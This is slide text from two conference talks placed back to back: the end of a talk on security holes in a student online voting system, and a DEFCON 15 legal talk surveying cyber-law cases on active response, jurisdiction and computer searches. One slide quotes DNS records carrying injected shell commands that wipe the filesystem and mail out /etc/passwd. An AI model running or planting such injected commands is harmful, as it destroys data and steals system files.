• ASUC poll workers easy to social engineer
• Browser bugs
• At the time, Safari would accept any cert signed by a valid
authority, regardless of the name specified [9]
• Similar bugs appeared in Netscape and IE
Why SSL Doesn’t Matter
Part Four:
Lessons Learned
Critical Vulnerabilities in OES
• OES suffered from multiple critical security
vulnerabilities
• Easy to find and exploit
• Common ‘beginner’ blunders
• More subtle holes yet to be found?
OES vs. Commercial Systems?
• OES differs from the commercial systems in
a number of important ways
• Commercial electronic voting systems don’t
connect to the internet
• At least, we sincerely hope not
• OES source is available for review
• Expected lifetime for OES is much shorter
• Commercial systems could be in use for decades
• In light of OES’ flaws, existence of similar bugs in
commercial systems is plausible
• Commercial systems are closed
• Amplifies damage resulting from a security breach
• Increases time before holes are discovered
• Vendors appear new to computer security
• Mistakes likely
• Higher Stakes
• Commercial systems will be used to elect the President
Cause for Concern?
• Endorse VerifiedVoting.org’s Resolution on
Electronic Voting [10]
• Write to Congress
• Emphasize need for voter verified paper ballot
• Encourage the use of open source voting
systems
• Talk to local officials
• Purchasing decisions for voting hardware are
often made at the county level
What you can do
1. http://www.essvote.com/pdf/iv101502.pdf
2. http://www.diebold.com/solutions/election/accuvote_ts.htm
3. http://www.sequoiavote.com/productGuide.php
4. See Bruce Schneier’s excellent crypto snake oil rant
http://www.counterpane.com/crypto-gram-9902.html#snakeoil
5. http://www.verifiedvoting.org/
6. Daily Californian, 2/11/2003
http://www.dailycal.org/article.asp?id=10858
7. http://calnet.berkeley.edu
8. The real Verisign is Verisign, Inc.
9. Safari Common Name verification bug
http://www.secunia.com/advisories/8756/
10. http://www.verifiedvoting.org/resolution.asp
References | pdf |
DEFCON 15
August 3, 2007
Robert W. Clark
United States v. Prochner, 417 F.3d 54 (D. Mass.
July 22, 2005)
Definition of Special Skills
Special skill - a skill not possessed by members of the
general public and usually requiring substantial
education, training or licensing.
Examples - pilots, lawyers, doctors, accountants,
chemists, and demolition experts
Not necessarily have formal education or training
Acquired through experience or self-tutelage
Critical question is - whether the skill set elevates to a
level of knowledge and proficiency that eclipses that
possessed by the general public.
Court Recognizes Your
Special Skills
Since You Are Special
Clark’s Law – Explain @ 3rd Grade Level
Explaining Technology to Lawyers
FACTS ARE KING!!!
Explaining Computer Search/Technology
E-Discovery Rules
Final Point- Materials Provided Contain
Greater Details than Presentation slides.
Court Recognizes Your
Special Skills
Agenda
Active Response
Liability for Stolen Code??
Jurisdiction
Civil Jurisdiction
Criminal
Web Sites – Liabilities & Jurisdiction
Search & Seizure of Computers
Home
Work Place
Consent & Third Party Consent
Viacom v. Google
E-Discovery & Forensics
Our Discussion – Like law school, just to get you
thinking and debating. Not necessarily an
endorsement by the presenter, aka- me.
Disclaimer
aka The Fine Print
JER 3-307.
Teaching, Speaking and Writing
a.
Disclaimer for Speeches and Writings Devoted to Agency Matters. A DoD employee who uses or
permits the use of his military grade or who includes or permits the inclusion of his title or position as
one of several biographical details given to identify himself in connection with teaching, speaking or
writing, in accordance with 5 C.F.R. 2635.807(b)(1) (reference (h)) in subsection 2-100 of this Regulation,
shall make a disclaimer if the subject of the teaching, speaking or writing deals in significant part with
any ongoing or announced policy, program or operation of the DoD employee's Agency, as defined in
subsection 2-201 of this Regulation, and the DoD employee has not been authorized by appropriate
Agency authority to present that material as the Agency's position.
(1)
The required disclaimer shall expressly state that the views presented are those of the speaker or
author and do not necessarily represent the views of DoD or its Components.
(2)
Where a disclaimer is required for an article, book or other writing, the disclaimer shall be printed
in a reasonably prominent position in the writing itself. Where a disclaimer is required for a speech or
other oral presentation, the disclaimer may be given orally provided it is given at the beginning of the oral
presentation.
Self defense of personal property one must prove that
he was in a place he had a right to be, that he acted
without fault and that he used reasonable force
which he reasonably believed was necessary to
immediately prevent or terminate the other person's
trespass or interference with property lawfully in his
possession
Moore v. State, 634 N.E.2d 825 (Ind. App. 1994) and
Pointer v. State, 585 N.E. 2d 33, 36 (Ind. App. 1992)
Right to exclude people from one’s personal property
is not unlimited.
Active Response & Self Defense
Common Law Doctrine-Trespass to Chattel
Owner of personal property has a cause of action for
trespass and may recover only the actual damages
suffered by reason of the impairment of the property
or the loss of its use
One may use reasonable force to protect his
possession against even harmless interference
The law favors prevention over post-trespass
recovery, as it is permissible to use reasonable force
to retain possession of a chattel but not to recover it
after possession has been lost
Intel v. Hamidi, 71 P.3d 296 (Cal. Sp. Ct. June 30,
2003
Active Response & Self Help
Hoblyn v. Johnson, 2002 WY 152, 2002 Wyo. LEXIS
173 (Wyo., October 9, 2002, Decided)
One is privileged to enter land in the possession of another,
at a reasonable time and in a reasonable manner, for the
purpose of removing a chattel to the immediate
possession of which the actor is entitled, and which has
come upon the land otherwise than with the actor's consent
or by his tortious conduct or contributory negligence.
This privilege is limited to those situations where the actor,
as against all persons, is entitled to immediate possession
of the chattel both at the time when the chattel is placed on
the land and when the actor seeks to enter and reclaim it.
Active Response & Self Help
Defender or Attacker ?
Reverse DNS Entries
252.11.64.178in-addr.arpa 86400 IN PTR rm -Rf / ;
252.11.64.178in-addr.arpa 86400 IN PTR I rm -Rf /
253.11.64.178in-addr.arpa 86400 IN PTR ; cat
/etc/passwd I mail [email protected]
Attacker or Victim
Zone Transfer, one name server located on 178.64.11.8
# dig @178.64.11.8 version.bind chaos txt
Owned - - Xterms manipulated to execute code
MX records
Custom .NET tool in C# reverse lookup
3 entries catch eye with a LOL
rm –Rf /;, 178.64.11.252
I rm –Rf /, 178.64.11.253
; cat /etc/passwd I mail [email protected], 178.64.11.254
Active Response & Self Help
Universal Tube & Rollform Equipment Corp., v
YouTube, In., et al., 2007 WL 1655507 (N.D. Ohio.
June 4, 2007)
Lanham Act- Protectable Mark
Lanham Act provides a cause of action for infringement of a mark that has not been
federally registered. Courts must determine whether the mark is protectable, and if
so, whether there is a likelihood of confusion as a result of the would-be infringer's
use of the mark. Court allows claim to go forward
Trespass to Chattel
Trespass to chattel claim, although it involves something as amorphous as “the
internet,” must still maintain some link to a physical object-in that case, a computer.
Domain name is an intangible object, much like a street address or a telephone
number, which, though it may ultimately point to an approximate or precise
physical location, is without physical substance, and it is therefore impossible to
make “physical contact” with it. Universal's only hope of succeeding on its
trespass to chattels claim, therefore, rests on its ability to show a link to a physical
object. Universal entered contract w/ third party for website, so no interest in
host’s computers. Moreover, YouTube did not make physical contact with
computers hosting website, mistaken visitors did.
Nuisance
Active Response & Nuisance
Liability for Stolen Malicious Code
Hurdles
Your Code Stolen
Secured System
Your Code Attributed to You
Victim Sues
Analogy – Stolen Guns (Hey it’s the best I can do!!!)
Liability for Stolen Malicious Code
Negligence
(1) defendant had a duty to the plaintiff;
(2) defendant failed to perform that duty; and,
(3) defendant's breach was the proximate
cause of the plaintiff's injury
Item Causing the Harm
Firearms are inherently dangerous, and those
who own and control firearms should be
required to exercise the highest degree of care
Liability for Stolen Malicious Code
Negligence
Minimum causation requirement is the "but for"
test - accident would not have happened but for
the act or omission. Many opinions place
emphasis on foreseeability.
Courts show great reluctance to find liability if
the chain of causation includes a series of
events, subsequent to the initial act or omission,
over which the defendant has absolutely no
control - "intervening cause"
Liability for Stolen Malicious Code
Negligence
The defendant is not invariably excused from liability when the
chain of causation includes a criminal act.
The overwhelming weight of authority holds that the owner of
an automobile who parks the car in a public area with the keys
in the ignition is not liable to a motorist or a pedestrian injured
by the negligent driving of a thief who has an accident after
stealing the car. See Ford v. Monroe, 559 S.W.2d 759 (Mo. App.
1977).
June 2006, Sharon Kask, (girlfriend), boyfriend’s son, history
of violence, under psychiatric observation, home-made gun
cabinet, unscrews hinges, takes gun, shoots cop 3 times.
Mass. high court reverse summary judgment says, foreseeable
that he’d use unsupervised access to house to steal gun and
cause harm.
Liability for Stolen Malicious Code
Negligence – Malicious Code
The defendant is not invariably excused from liability when the
chain of causation includes a criminal act.
Your Computer or Network
Secured – with what and how.
Advertisement that code may be on system
Work in Security Field
IRC or Chat Rooms
Lectures and Presentations at say . . . Black Hat
The Item Causing the Harm
Code - how inherently dangerous?
Virus
Worm
Rootkit
Terms of Probation
United States v. Voelker, --- F.3d ----, 2007 WL 1598534
(3d Cir. W.D. Penn. June 5, 2007)
1. The defendant is prohibited from accessing any
computer equipment or any “on-line” computer service
at any location, including employment or education. This
includes, but is not limited to, any internet service
provider, bulletin board system, or any other public or
private computer network;
2. The defendant shall not possess any materials,
including pictures, photographs, books, writings,
drawings, videos or video games depicting and/or
describing sexually explicit conduct as defined at Title
18, United States Code, Section 2256(2); and
3. The defendant shall not associate with children under
the age of 18 except in the presence of a responsible
adult who is aware of the defendant’s background and
current offense and who has been approved by the
probation officer
Terms of Probation
United States v. Voelker, --- F.3d ----, 2007 WL 1598534
(3d Cir. W.D. Penn. June 5, 2007)
Condition must be “reasonably related” to the factors
set forth in 18 U.S.C. § 3553(a). Those factors include:
“(1) the nature and circumstances of the offense and the
history and characteristics of the defendant; [and] (2) the
need for the sentence imposed . . . (B) to afford adequate
deterrence to criminal conduct; (C) to protect the public
from further crimes of the defendant; and (D) to provide
the defendant with needed educational or vocational
training, medical care, or other correctional treatment in
the most effective manner.” 18 U.S.C. § 3553(a). Any
such condition must impose “no greater deprivation of
liberty than is reasonably necessary” to deter future
criminal conduct, protect the public, and rehabilitate the
defendant
Terms of Probation
United States v. Voelker, --- F.3d ----, 2007 WL 1598534
(3d Cir. W.D. Penn. June 5, 2007)
PROHIBITION OF COMPUTER EQUIPMENT AND THE
INTERNET
Voelker contends that an absolute lifetime ban on using computers
and computer equipment as well as accessing the internet, with no
exception for employment or education, involves a greater
deprivation of liberty than is reasonably necessary and is not
reasonably related to the factors set forth in 18 U.S.C. § 3583. We
agree.
The ubiquitous presence of the internet and the all-encompassing
nature of the information it contains are too obvious to require
extensive citation or discussion
Civil Jurisdiction v Criminal Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc.
LEXIS 1307 (NY Sp Ct May 10, 2006)
Hageseth v Superior Court of San
Mateo County, --- Cal.Rptr.3d ----,
2007 WL 1464250, Cal.App. 1 Dist.
(May 21, 2007)
Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY
Sp Ct May 10, 2006)
Plaintiff sued for destruction of personal property, defamation,
intentional infliction of emotional distress, tortious interference
with a business, computer trespass, and computer tampering.
On February 20, 2005, the defendants, his uncle and aunt,
without permission or authority, entered the Website from
their home computer in Florida, deleted all of the files on the
Website, and placed their own picture of the plaintiff on the
Website, with phrases such as "Pig of the Year," and "I'm
going to eat everything in site," next to the plaintiff's picture.
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY
Sp Ct May 10, 2006)
Defendants contend the Court lacks jurisdiction over them since
defendants do not reside in New York, have not consented to
service of process in New York, are not "doing business" in New
York, and have no offices or employees in New York
Defendants also contend that jurisdiction is lacking given that they
have not transacted business in New York, and have had no
contacts with New York sufficient to establish that they
purposefully availed themselves of the privileges of conducting
business in New York.
The defendants also maintain that a New York court may not exert
personal jurisdiction over them since the defendants have not
committed a tortious act within the state.
Jurisdiction
Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY
Sp Ct May 10, 2006)
Plaintiff alleges that the Court has personal jurisdiction over the
defendants. Plaintiff points out that Courts have held that in this
age of instant communications via telephone, facsimile and the
internet, physical presence of the defendants in New York is not
required for a finding of a tortious act within the state. Plaintiff
notes that the court should place emphasis on the locus of the tort,
not physical presence, when determining a jurisdictional issue.
Plaintiff submits that New York was the locus of the alleged
tortious act since the plaintiff's computer is located within New
York, and the content of plaintiff's Website originated from
plaintiff's computer in New York. Therefore, plaintiff argues, it is
"wholly immaterial" that the plaintiff's Website was hosted by a
Florida internet server.
Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY
Sp Ct May 10, 2006)
The extent a court may exercise personal jurisdiction over a
nondomiciliary without violating the Due Process Clause of the
Constitution was defined in the Supreme Court's opinion in
International Shoe Co. v Washington (326 U.S. 310, 66 S. Ct.
154, 90 L. Ed. 95 [1945]). In order to subject a defendant to a
judgment in personam, "if he be not present within the territory of
the forum, he must have certain minimum contacts with the forum
state such that the "maintenance of the suit does not offend
traditional notions of fair play and substantial justice."
(International Shoe Co. v State of Wash., supra at 316;World-Wide
Volkswagen Corp. v Woodson, 444 U.S. 286, 100 S. Ct. 559, 62 L.
Ed. 2d 490 [1980]; see also Indosuez International Finance B.V. v
National Reserve Bank, 98 N.Y.2d 238, 774 N.E.2d 696, 746
N.Y.S.2d 631 [2002]).
Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY
Sp Ct May 10, 2006)
The issue is whether this Court may exercise personal jurisdiction
over the defendants where defendants, though not physically
present in New York, allegedly commit tortious acts on an internet
website created by plaintiff, thereby injuring plaintiff in New York.
Plaintiff maintains that the defendants need not be physically
present in New York when committing their alleged tortious acts in
order to be subject to personal jurisdiction in New York .
Defendants maintain otherwise.
New York law is unsettled as to whether defendants' physical
presence in New York while committing the tortious act is a
prerequisite to jurisdiction.
Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY
Sp Ct May 10, 2006)
Citing, Banco Nacional Utramarino v Chan, 169 Misc. 2d 182,
641 N.Y.S.2d 1006 [Supreme Court New York County 1996],
affirmed in, 240 A.D.2d 253, 659 N.Y.S.2d 734 [1st Dept 1997],
to allow a defendant to conspire and direct tortious activities in
New York, in furtherance of that conspiracy, and then avoid
jurisdiction because it directs those activities from outside the
State . . . , is to ignore the reality of modern banking and
computer technology in the end of the 20th century! A defendant
with access to computers, fax machines, etc., no longer has to
physically enter New York to perform a financial transaction
which may be . . . tortious, i.e., conversion. . . . The emphasis
should be on the locus of the tort, not whether defendant was
physically here when the tortious act occurred. Once the court
finds that the tort occurred within the State, it should look at the
totality of the circumstances, to determine if jurisdiction should
be exercised.
Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY Sp ct
May 10, 2006)
Although the alleged damage to plaintiff's information on the Website
was "felt" by plaintiff in New York, it is insufficient that the damages
were felt by plaintiff in New York. The relevant inquiry is whether a
tortious act occurred in New York. The act of damaging the Website at
best, occurred in Florida, where defendants were located when they
typed on their computer and accessed the Website's Hosting Company
in Florida. In the context of the internet, the content of plaintiff's
Website cannot be deemed to be located wherever the content may be
viewed, for jurisdictional purposes, as it has been held that the mere
fact that the posting appears on the website in every state will not give
rise to jurisdiction in every state (emphasis added) (see Seldon v Direct
Response Tech., 2004 U.S. Dist. LEXIS 5344 [SDNY 2004]).
The result may have been different if the defendants tapped into and
interfered with plaintiff's information located on a server or inside a
computer physically situated in New York. However, the server here is
located in Florida, and the alleged acts of the defendants never reached
beyond the bounds of Florida into New York.
McCague v. Trilogy Corp., 2007 WL 839921 (E.D. Pa.
Mar 15, 2007)
Defendant a charter boat company in Hawaii.
Two websites with emails to customer base, general
information and promotional material, allows reservation of
boat tours
Anthony McCague goes whale watching and has rough trip
Alleges fractured back and other injuries
Alleges negligently operated in rough seas.
Sues in Pennsylvania
Court holds- no personal or general jurisdiction over
Defendants
Jurisdiction
McCague v. Trilogy Corp., 2007 WL 839921 (E.D. Pa.
Mar 15, 2007)
Issue is whether Trilogy's websites, accessible in Pennsylvania,
constitute a continuous or systematic part of Trilogy's general
business sufficient to establish personal jurisdiction over it in
this district. There are no United States Supreme Court or
Third Circuit Court of Appeals cases deciding whether an
internet website can establish general personal jurisdiction
over a defendant. One district court has determined this by a
sliding scale: personal jurisdiction is proper if a website is
"interactive" but not if the website is passive. Molnlycke, 64
F.Supp. 2d at 451.
Trilogy’s website neither wholly passive or interactive.
Trilogy’s website do not specifically target Pennsylvanians
Business from website minimal percentage
Jurisdiction
Web Site as Doctor
Hageseth v Superior Court of San Mateo County, ---
Cal.Rptr.3d ----, 2007 WL 1464250, Cal.App. 1 Dist. (May
21, 2007)
June 2005, Stanford freshman, John McKay accessed an overseas
online pharmacy portal, USAnetrx.com, to obtain prescription drugs
"without the embarrassment of talking to a doctor." Unlike most
online pharmacies, this site did not require a faxed or mailed
prescription from a licensed pharmacist.
McKay ordered 90 capsules of the Prozac after sending his credit
card and some medical history through an online questionnaire.
Order routed through JRB Health Solutions, a Florida company.
Colorado physician Dr. Christian Hageseth, a JRB subcontractor,
authorized the prescription, without speaking to McKay.
A Mississippi-based pharmacy used by JRB filled the prescription
and sent the medication to McKay in California.
On August 2, 2005, intoxicated on alcohol and with Prozac in his
system, McKay - in an apparent suicide -- died of carbon monoxide
poisoning
Web Site as Doctor
Hageseth v Superior Court of San Mateo County, ---
Cal.Rptr.3d ----, 2007 WL 1464250, Cal.App. 1 Dist. (May
21, 2007)
San Mateo County District Attorney filed a criminal complaint
charging petitioner with the felony offense of practicing
medicine in California without a license in violation of section
2052 of the Business and Professions Code punishable by one
year confinement and a $10,000 fine
Question whether a defendant who was never himself
physically present in this state at any time during the
commission of the criminal offense with which he is charged,
and did not act through an agent ever present in this state, is
subject to the criminal jurisdiction of respondent court even
though no jurisdictional statute specifically extends the
extraterritorial jurisdiction of California courts for the
particular crime with which he is charged
Web Site as Doctor
Hageseth v Superior Court of San Mateo County, ---
Cal.Rptr.3d ----, 2007 WL 1464250, Cal.App. 1 Dist. (May
21, 2007)
Conduct consisted entirely of Internet-mediated communications
Petitioner was at all material times located in Colorado and never
directly communicated with anyone in California regarding the
prescription. His communications were only with JRB, from whom he
received McKay's online request for fluoxetine and questionnaire,
and to whom he sent the prescription he issued
Motion to dismiss for failure to state a crime (demur –territorial
jurisdiction)
Web Site as Doctor
Hageseth v Superior Court of San Mateo County, ---
Cal.Rptr.3d ----, 2007 WL 1464250, Cal.App. 1 Dist. (May
21, 2007)
When the commission of a public offense, commenced without the State, is
consummated within its boundaries by a defendant, himself outside the State,
through the intervention of an innocent or guilty agent or any other means
proceeding directly from said defendant, he is liable to punishment therefor in
this State in any competent court within the jurisdictional territory of which
the offense is committed.
A preponderance of the evidence shows that, without having at the time a
valid California medical license, petitioner prescribed fluoxetine for a person
he knew to be a California resident knowing that act would cause the
prescribed medication to be sent to that person at the California address he
provided. If the necessary facts can be proved at trial beyond a reasonable
doubt, the People will have satisfactorily shown a violation of Business and
Professional Code section 2052. It is enough for our purposes that a
preponderance of the evidence now shows that petitioner intended to produce
or could reasonably foresee that his act would produce, and he did produce,
the detrimental effect section 2052 was designed to prevent.
Search- Jurisdiction
In the Matter of the Search of Yahoo, Inc., 2007 WL 1539971
(D.Ariz May 21, 2007).
Court finds that 18 U.S.C. § 2703(a) authorizes a federal district
court, located in the district where the alleged crime occurred,
to issue search warrants for the production of electronically-
stored evidence located in another district. The warrant must
be issued in compliance with the procedures described in
FRCP 41. FRCP 41(b) however, does not limit the authority of
a district court to issue out-of-district warrants under § 2703(a)
because Rule 41(b) is not procedural in nature and, therefore,
does not apply to § 2703(a).
Court concludes that § 2703(a) authorizes an Arizona
magistrate judge to issue an out-of-district search warrant for
the contents of communications electronically-stored in
California when the alleged crime occurred in the District of
Arizona.
Web Based Software as Counsel
In re Reynoso, 477 F.3d 1117 (9th Cir. N.D. Cal. Feb.
27, 2007)
Website Bankruptcy Software Product
Held- Engaged in fraud and Unauthorized Practice of Law
Court found vendor qualified as a bankruptcy petition preparer, first
time that the Ninth Circuit had determined that a software-provider
could qualify as such
Services rendered must go beyond mere clerical preparation or
impersonal instruction on how to complete the forms
Several features of software and how it was presented to users
constituted the unauthorized practice of law.
Vendor – “offering legal expertise” “loopholes in the bankruptcy
code” "top-notch bankruptcy lawyer" "expert system."
Web Based Software as Counsel
In re Reynoso, 477 F.3d 1117 (9th Cir. N.D. Cal. Feb.
27, 2007)
More than mere clerical services. Software chose where to place the
user's information, selected which exemptions to claim, and
provided the legal citations to back everything up.
Court concluded this level of personal, although automated,
guidance amounted to the unauthorized practice of law.
Ninth Circuit specifically limited its holding to the facts of the case,
and gave no opinion whether software alone (i.e., without the
representations made on the web site) or different types of programs
would constitute an unauthorized legal practice.
The decision stands for the proposition that an overly expert
program, coupled with poorly chosen statements, can expose a
software vendor to claims of practicing law without a license
Web Pages & ISP
Universal Communication Systems, Inc. v. Lycos, Inc.,
--- F.3d ----, 2007 WL 549111, (1st Cir. Mass. February
23, 2007)
Plaintiffs USC and its CEO brought suit, objecting to a series
of allegedly false and defamatory postings made under
pseudonymous screen names on an Internet message board
operated by Lycos, Inc
Communications Decency Act 47 U.S.C. § 230 - Congress
granted broad immunity to entities, such as Lycos, that
facilitate the speech of others on the Internet
Allegations of disparaging financial conditions; business
prospects; management integrity
230- No provider or user of an interactive computer service
shall be treated as the publisher or speaker of any information
provided by another information content provider
Web Pages & ISP
Fair Housing Council v Roommates.com, --- F.3d ----,
2007 WL 1412650 (9th Cir. C.D. Cal. May 15, 2007)
According to the CDA, no provider of an interactive computer service
shall be treated as the publisher or speaker of any information
provided by another information content provider. 47 U.S.C. § 230(c).
One of Congress’s goals in adopting this provision was to encourage
“the unfettered and unregulated development of free speech on the
Internet.” Batzel v. Smith, 333 F.3d 1018, 1027 (9th Cir. 2003)
Councils do not dispute that Roommate is a provider of an interactive
computer service. As such, Roommate is immune so long as it merely
publishes information provided by its members. However, Roommate
is not immune for publishing materials as to which it is an
“information content provider.” A content provider is “any person or
entity that is responsible, in whole or in part, for the creation or
development of information provided through the Internet.” 47 U.S.C.
§ 230(f)(3) (emphasis added). If Roommate is responsible, in whole or
in part, for creating or developing the information, it becomes a
content provider and is not entitled to CDA immunity.
Seizures
In re Forgione, 2006 Conn. Super. LEXIS 81 (January 6, 2006)
Petitioner family members filed a motion for the return of
unlawfully seized computer items under U.S. Const. amend. IV
and XIV and Conn. Const. art. I, §§ 7 and 8, as well as the
return of their seized internet subscriber information. They
further moved for a court order suppressing the use of the
computer items and the subscriber information as evidence in
any criminal proceedings involving any member of the family
A university student complained to the school's information
security officer that someone had interfered with the student's
university E-mail account. The officer determined the internet
protocol address from where the student's account was being
accessed and informed the police of his findings. The police
then obtained a search warrant to learn from an internet
service provider to whom that address belonged. Once the
police were informed that the address belonged to one of the
family members, they obtained a search warrant for the family
members' home
Seizures
In re Forgione, 2006 Conn. Super. LEXIS 81 (January 6, 2006)
The family members asserted that the searches and seizures
under the search warrants were improper.
The court found that, using the totality of the circumstances
test, there was an abundant basis, without the student's
statement to the officer about a breakup with a family member,
within the four corners of either search and seizure warrant
affidavits, to reasonably indicate to either warrant-issuing
judge that probable cause existed for issuance of the requested
orders. Further, the family members did not have an
expectation of privacy in the subscriber information, as it was
voluntarily divulged to the internet service provider
Computer Search
Third Party Consent
U.S. v. Rader, 65 M.J. 30 (U.S.C.C.A. May 04,
2007)
The question before us is whether Appellant's
roommate had sufficient access and control of
Appellant's computer to consent to the search
and seizure of certain unencrypted files in
Appellant's non-password-protected computer.
Joint Occupants - Accused's roommate had
sufficient access to and control over Accused's
computer to give valid consent to its search,
where the computer was located in roommate's
bedroom, it was not password protected,
accused never told roommate not to access
computer.
Computer Search
Third Party Consent
U.S. v. Buckner, 473 F.3d 551 (4th Cir. W.D. Vir. Jan 7,
2007)
Police Investigation of Michelle Buckner for fraud using AOL and
eBay accounts
Knock and talk, Michelle not home husband Frank is home, cops
ask Frank to have Michelle contact them
Michelle goes to police station says she knows nothing about the
fraud and that she leases the computer in her name and uses it
occasionally to play solitaire. Police re-visit Buckner household
next day
Michelle again agrees to cooperate fully telling officers take
whatever you want.
Computer on living room table, oral consent to seize, cops take PC
and mirror the hard drive
Frank indicted on 20 counts of wire fraud.
Frank motion to suppress and testifies access to his files requires a
password
Nothing in record indicates officers knew files were password
protected and their forensic analysis tool would not necessarily
detect passwords.
Computer Search
Third Party Consent
U.S. v. Buckner, 473 F.3d 551 (4th Cir. W.D. Vir. Jan 7,
2007)
No actual authority to consent
Common authority, mutual use
Michelle has apparent authority
Facts to officers, totality of circumstances, appear reasonable
Investigation focused on Michelle, PC in her name, no indication
files password protected; Frank told of investigation and does not
affirmatively states his files password protected
Cops cannot rely on apparent authority to search using a method to
intentionally avoid discovery of passwords or encryption protection
by user.
In this case they simply didn’t check for it.
U.S. v. Aaron, 2002 WL 511557 (6th Cir. April 3, 2002)
Girlfriend consents no passwords
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April
25, 2007)
Investigation of Regpay, third-party billing and CC
company provides subscribers with access to websites
containing child pornography
Ray Andrus identified; records check gives house address;
Ray, Richard & Dr. Bailey Andrus
Email address provided to Regpay, [email protected]
Investigation focuses on Ray, but 8 months later not
enough for warrant so decide on knock and talk
Dr. Andrus answers door
So issue clearly becomes third party consent, sufficient
access and control yada, yada, yada
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April 25,
2007)
Dr. Andrus answers door in pajamas
Dr. Andrus 91 years old (nothing said on faculties or frailty)
Dr. Andrus invites officers in
Informs officers Ray lives in center bedroom; did not pay rent;
living here to care for his elderly parents
Bedroom door open and in plain sight of officers and Dr.
Andrus states he has access to bedroom feels free to enter
when door open but knocks when it is closed
Officer asks Dr for consent to search house and computers in
it, Dr agrees.
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan.
April 25, 2007)
District Court determined Dr. Andrus’ consent was
voluntary, but lacked actual authority to consent to a
computer search. Dr. Andrus did not know how to use the
computer, had never used the computer, and did not know
the user name that would have allowed him to access the
computer. The district court then proceeded to consider
apparent authority. It indicated the resolution of the
apparent authority claim in favor of the government was a
“close call.”
Dr. Andrus authority to consent to a search of the computer
reasonable until learned only one computer. Because
Cheatham instructed Kanatzar to suspend search no
Fourth Amendment violation.
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April
25, 2007)
District Court, Apparent authority because:
(1) Email address [email protected] associated with Dr.
Bailey Andrus, used to register with Regpay and procure child
pornography;
(2) Dr. Andrus told the agents he paid the household’s internet
access bill;
(3) Agents knew several individuals lived in the household;
(4) Bedroom door not locked, leading a reasonable officer to
believe other members of the household could have had
access to it;
(5) Computer in plain view of anyone who entered the room
and appeared available for anyone’s use. Implicit in the district
court’s analysis assumption that officers could reasonably
believe Dr. Andrus accessed the internet through computer in
bedroom, giving Dr. Andrus the authority to consent to a
search of the computer.
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April
25, 2007)
At Appellate level
Objects associated with high expectation of privacy include
valises, suitcases, footlockers, and strong boxes.
Case of first impression for 10th Circuit. Court notes
individual’s expectation of privacy in computers has been
likened to a suitcase or briefcase. U.S. v. Aaron, 2002 WL
511557 (6th Cir. April 3, 2002)
Password protected files compared to locked footlockers.
Trulock v. Freeh, 275 F.3d 391 (4th Cir. 2001)
For most people, their computers are their most private
spaces. People commonly talk about the bedroom as a very
private space, yet when they have parties, all the guests—
including perfect strangers —are invited to toss their coats on
the bed. But if one of those guests is caught exploring the
host’s computer, that will be his last invitation. United States v.
Gourde, 440 F.3d 1065, 1077 (9th Cir. 2006) (en banc)(Kleinfeld,
J., dissenting).
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April
25, 2007)
Looking good for home team and locked computer
files, then-
Reasonable officer and knowing or seeing the a
computer or file is locked, visual inspection, not
apparent
Password or locked may only be discovered by starting
up the machine or attempting access to file
Court acknowledges the EnCase allows user profiles
and passwords to be by passed. Court fails to
acknowledge that it can also be set up to identify
passwords
Critical issue- whether LEA knows or reasonably
suspects computer is password protected
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April
25, 2007)
Critical issue- whether LEA knows or reasonably suspects
computer is password protected
Computer in bedroom occupied by 51 year old son
Dr unlimited or at will access to room (Court forgets when
door closed Dr knocks and doesn’t simply go in)
No specific questions to this 91 year old about his use of PC
but Dr said nothing indicating need for such questions (shift
of burden here??)
Dr owned house and internet bill in his name (okay)
Email address his initials bandrus (iffy at best)
Defendant argument- PC locked cops would have known
if they asked.
Court reply- officers are not obligated to ask questions unless
circumstances are ambiguous.
Court doesn’t feel password protection so pervasive that
officers ought to know password protection likely. Comments
that dissent wants to take judicial notice of this fact.
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April
25, 2007)
Finally-
Ray Andrus subsequent consent to search- Court holds
voluntary
And lastly, being a former Gov’t Hack. . .
The “seen” lock argument. Pretty damn good cops that
can see if my footlocker or briefcase is locked if it is a
typical key system
EnCase easily configured to first check for users and
passwords
Computer Search
Revoking Consent
United States v. Ward, 576 F.2d 243 (9th Cir. 1978); Mason v. Pulliam,
557 F.2d 426 (5th Cir. 1977).
Both dealt with the revocation of consent concerning financial documents provided to the Internal
Revenue Service (IRS). In both cases, the taxpayers revoked consent to search financial
documents and the courts suppressed evidence taken from the records after consent had been
withdrawn. While these courts suppressed certain documents seized after consent was revoked,
neither court suppressed incriminating evidence discovered prior to the revocation.
Jones v. Berry, 722 F.2d 443 (9th Cir. 1983)
IRS agents received permission to search a residence and seized sixteen boxes of documents. On
that same day, after documents seized, defendant revoked consent and demanded the return of the
documents. The IRS refused to return the documents.
Ninth Circuit held documents properly seized prior to the revocation of consent were not taken in
violation of the fourth amendment. The holding requires only the suppression of evidence
discovered after the consent had been revoked.
No claim can be made that items seized in the course of a consent search, if found, must be
returned when consent is revoked. Such a rule would lead to the implausible result that
incriminating evidence seized in the course of a consent search could be retrieved by a revocation
of consent.
U.S. v. Andracek, 2007 WL 1575355 (E.D.Wis., May 30, 2007)
Defendant does not revoke consent in light of threat to subsequently
obtain a warrant. Still voluntary.
As for the agents' statements indicating that they would be requesting a warrant if
Andracek did not consent to the seizure of his computer, this can hardly be considered a
threat. This was a logical alternative if Andracek did not consent to the seizure of his
